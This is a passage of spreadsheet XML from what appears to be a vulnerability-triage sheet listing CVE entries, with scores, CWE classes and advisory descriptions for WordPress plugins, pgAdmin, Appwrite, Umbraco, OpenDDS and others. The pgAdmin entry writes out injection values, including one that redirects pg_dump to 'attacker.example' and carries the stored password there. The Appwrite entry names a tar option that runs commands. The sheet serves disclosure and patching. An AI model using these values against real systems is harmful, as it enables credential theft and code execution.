      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>The Dewa Kirim  WordPress plugin through 1.0.0 does not escape delivery coordinates submitted at checkout before outputting them inside an inline script, allowing unauthenticated users to store JavaScript that runs in the session of an administrator who later opens the order.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87786</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88792</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>The Dictionary WordPress plugin through 1.0 does not have authorisation, sanitisation or escaping in place when adding or updating dictionary entries, allowing unauthenticated users to store arbitrary web scripts which will execute when a user views an affected entry.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88792</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88904</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>The PuppyFW WordPress plugin through 0.4.4 does not have proper authorisation on one of its REST routes, which tests the caller against a capability taken from the request itself, allowing any authenticated user, including subscribers, to add, modify and delete arbitrary blog options and thereby escalate their privileges.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88904</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92918</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-532</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>admin3 through 3.0.0 persists user session tokens in the audit log event body when publishing UserLoggedIn domain events. Attackers with log:view permission can read the JSON response from the GET /logs endpoint to harvest session tokens and replay them as bearer credentials for full user access.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92918</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92970</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>HUBzero CMS through 2.2.32 contains a path traversal vulnerability in project file upload handlers that allows authenticated project members to write arbitrary files outside the project repository. Attackers can supply traversal sequences in upload parameters to write files to attacker-chosen paths with web server privileges, potentially enabling code execution.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92970</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92972</t>
        </is>
      </c>
      <c r="D88" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>SGLang through 0.5.19 in prefill/decode disaggregation mode contains an unauthenticated PUT /route endpoint on the prefill bootstrap service that allows attackers to poison the KV transfer routing table. Attackers can supply arbitrary rank_ip and rank_port values to redirect decode workers to attacker-controlled endpoints, causing denial of service or disclosure of KV transfer metadata including session identifiers and tensor-parallel topology parameters.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92972</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52836</t>
        </is>
      </c>
      <c r="D89" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E89" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F89" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>OpenDDS is an open source C++ implementation of the Object Management Group (OMG) Data Distribution Service (DDS). Prior to 3.34.0, a network attacker can crash a reachable OpenDDS participant by sending a malformed RTPS UDP submessage whose crafted length or sequence-number state causes dds/DCPS/transport/rtps_udp/RtpsUdpReceiveStrategy.cpp in RtpsUdpReceiveStrategy::handle_input() to advance ACE_Message_Block::rd_ptr() beyond valid data. The parser can then call dds/DCPS/transport/rtps_udp/RtpsSampleHeader.cpp in RtpsSampleHeader::init(), which dereferences the invalid read pointer without first validating it against wr_ptr() or ensuring that a complete submessage header remains. The resulting SIGSEGV occurs in the receive thread, terminates the DDS process, and destroys the DDS entities hosted by that participant. No authentication, prior protocol state, or victim interaction is required. This issue is fixed in version 3.34.0.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52836</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54343</t>
        </is>
      </c>
      <c r="D90" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Prior to version 2.52.1, a remote attacker can request a traversal path handled by SCORMRenderer.render in lms/page_renderers.py. The renderer constructs and opens a server-side path without first confirming that its real path remains within public/scorm, allowing files outside the SCORM directory to be read when they are accessible to the server process. This issue is fixed in version 2.52.1.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54343</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B91" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C91" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54571</t>
        </is>
      </c>
      <c r="D91" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E91" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F91" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G91" s="5" t="inlineStr"/>
      <c r="H91" s="5" t="inlineStr"/>
      <c r="I91" s="5" t="inlineStr"/>
      <c r="J91" s="5" t="inlineStr"/>
      <c r="K91" s="5" t="inlineStr"/>
      <c r="L91" s="5" t="inlineStr"/>
      <c r="M91" s="5" t="inlineStr"/>
      <c r="N91" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O91" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P91" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q91" s="5" t="inlineStr"/>
      <c r="R91" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S91" s="5" t="inlineStr">
        <is>
          <t>ESPAsyncWebServer is an asynchronous HTTP and WebSocket server library for ESP32, ESP8266, RP2040 and RP2350. Prior to 3.11.1, the multipart/form-data parser in src/WebRequest.cpp stores _boundaryPosition as an 8-bit value while _parseMultipartPostByte processes the boundary. A remote request containing an exactly 256-byte multipart boundary wraps _boundaryPosition from 255 to zero, prevents the boundary parsing loop from terminating, consumes excessive CPU, and triggers a FreeRTOS watchdog reset on affected ESP32 or ESP8266 devices. This issue is fixed in version 3.11.1.</t>
        </is>
      </c>
      <c r="T91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54571</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B92" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C92" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63459</t>
        </is>
      </c>
      <c r="D92" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E92" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F92" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G92" s="5" t="inlineStr"/>
      <c r="H92" s="5" t="inlineStr"/>
      <c r="I92" s="5" t="inlineStr"/>
      <c r="J92" s="5" t="inlineStr"/>
      <c r="K92" s="5" t="inlineStr"/>
      <c r="L92" s="5" t="inlineStr">
        <is>
          <t>npm:@vendure/dashboard</t>
        </is>
      </c>
      <c r="M92" s="5" t="inlineStr">
        <is>
          <t>3.6.5</t>
        </is>
      </c>
      <c r="N92" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O92" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P92" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q92" s="5" t="inlineStr"/>
      <c r="R92" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S92" s="5" t="inlineStr">
        <is>
          <t>Vendure is an open-source headless commerce platform. Prior to 3.6.5, RichTextDescriptionCell in packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx attempts to strip markup by assigning an administrator-controlled description to a live element's innerHTML and then reading textContent. Active resource markup can execute an event handler during the innerHTML assignment before textContent is read. A lower-privilege administrator can store such markup in descriptions rendered by the Products list, Collections list, Promotions list, Payment Methods list, or Shipping Methods list, and script executes when another administrator views the affected row. This stored cross-site scripting can compromise the viewing administrator's session and enable cross-privilege or cross-channel administrative actions. This issue is fixed in version 3.6.5.</t>
        </is>
      </c>
      <c r="T92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63459</t>
        </is>
      </c>
    </row>
    <row r="93">
      <c r="A93" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B93" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69197</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr">
        <is>
          <t>nuget:Umbraco.Cms</t>
        </is>
      </c>
      <c r="M93" s="5" t="inlineStr">
        <is>
          <t>13.15.1, 17.5.3, 18.0.2</t>
        </is>
      </c>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>Umbraco is an ASP.NET CMS. Prior to 13.15.1, 17.5.3, and 18.0.2, the Content Delivery API applies member and Public Access checks to the directly requested node but not to referenced nodes serialized through Content Picker or Multi-Node Tree Picker properties, including pickers nested in Block List, Block Grid, or Rich Text Editor blocks. When DeliveryApi:PublicAccess is enabled, an anonymous caller can retrieve a protected node's name, route, and id through an unprotected referencing node and use ?expand to retrieve full property values. When the Delivery API is instead gated by the organization-wide API key, a key holder can still bypass per-node Public Access through the same expansion path. The same RequestContextOutputExpansionStrategyV2 and ElementOnlyOutputExpansionStrategy path also bypasses allowed or disallowed content-type alias restrictions for referenced content. Direct requests for the protected node still return 401, and no integrity or availability impact is established. This issue is fixed in versions 13.15.1, 17.5.3, and 18.0.2.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69197</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77615</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr"/>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>Paella Player is a set of libraries to create a multi stream video player. Prior to Paulla Player 2.12.11 (as used in Opencast prior to 19.7 and 20.2), there is a potential XSS attack though closed captions cue text. This vulnerability is fixed in 2.12.11.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77615</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86864</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-88</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>pgAdmin 4's Backup tool appended the client-supplied 'database' field from the /backup/job/&lt;sid&gt;/object request to the pg_dump argument vector as a bare trailing positional argument, without validation. Because pg_dump parses its options with getopt_long, which permutes arguments, a value beginning with a dash was interpreted as an option rather than as a database name. A value such as --file=/absolute/path therefore overrode the storage-confined --file that pgAdmin had constructed earlier, causing pg_dump to write its output anywhere the pgAdmin process could write, outside the user's File Manager storage directory. This yields arbitrary file creation and overwrite as the operating-system account running pgAdmin, which can destroy pgAdmin's own configuration database and, depending on the target chosen, be escalated further.
The same field additionally permitted connection-string injection. libpq expands a database name containing an equals sign into a full connection string, and keywords embedded there override the --host and --port that pgAdmin passes, so a value such as 'host=attacker.example port=5432 dbname=x' redirected pg_dump to a server of the attacker's choosing. Because pgAdmin exports the decrypted stored database password in the PGPASSWORD environment variable before executing the utility, the redirected connection carries that credential to the attacker-nominated endpoint. Both behaviours are reachable by any authenticated user holding the tools_backup permission, which is granted to the default User role.
The fix stops passing the database name through the argument vector altogether and supplies it in the PGDATABASE environment variable, which libpq treats as a literal database name and never expands as a connection string. This matches the approach already used by the Import/Export tool. Regression tests assert that the database name is absent from the constructed argument vector and that PGDATABASE carries the exact requested value.
This issue affects pgAdmin 4: from the introduction of the trailing positional database argument in the Backup tool before 9.18.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86864</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89036</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>Appwrite before 2.0.0 contains an argument injection vulnerability that allows authenticated users with functions.write or sites.write permissions to execute arbitrary commands by injecting TAB characters into the providerRootDirectory parameter used to construct GNU tar commands. The application uses escapeshellcmd instead of escapeshellarg and fails to quote the parameter, allowing TAB characters to survive sanitization and be interpreted as argument separators, enabling injection of arbitrary GNU tar arguments such as --checkpoint-action=exec to achieve remote code execution as the builds worker process user.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89036</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89418</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>cve-coordination@google.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>google-protobuf contains an unbounded recursion when parsing unknown protobuf group fields. An attacker can send a small crafted payload of deeply nested START_GROUP wire bytes to any Node.js service that calls the generated deserializeBinary() API, causing a RangeError: Maximum call stack size exceeded and crashing the process. No authentication or prior knowledge of the schema is required.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89418</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92971</t>
        </is>
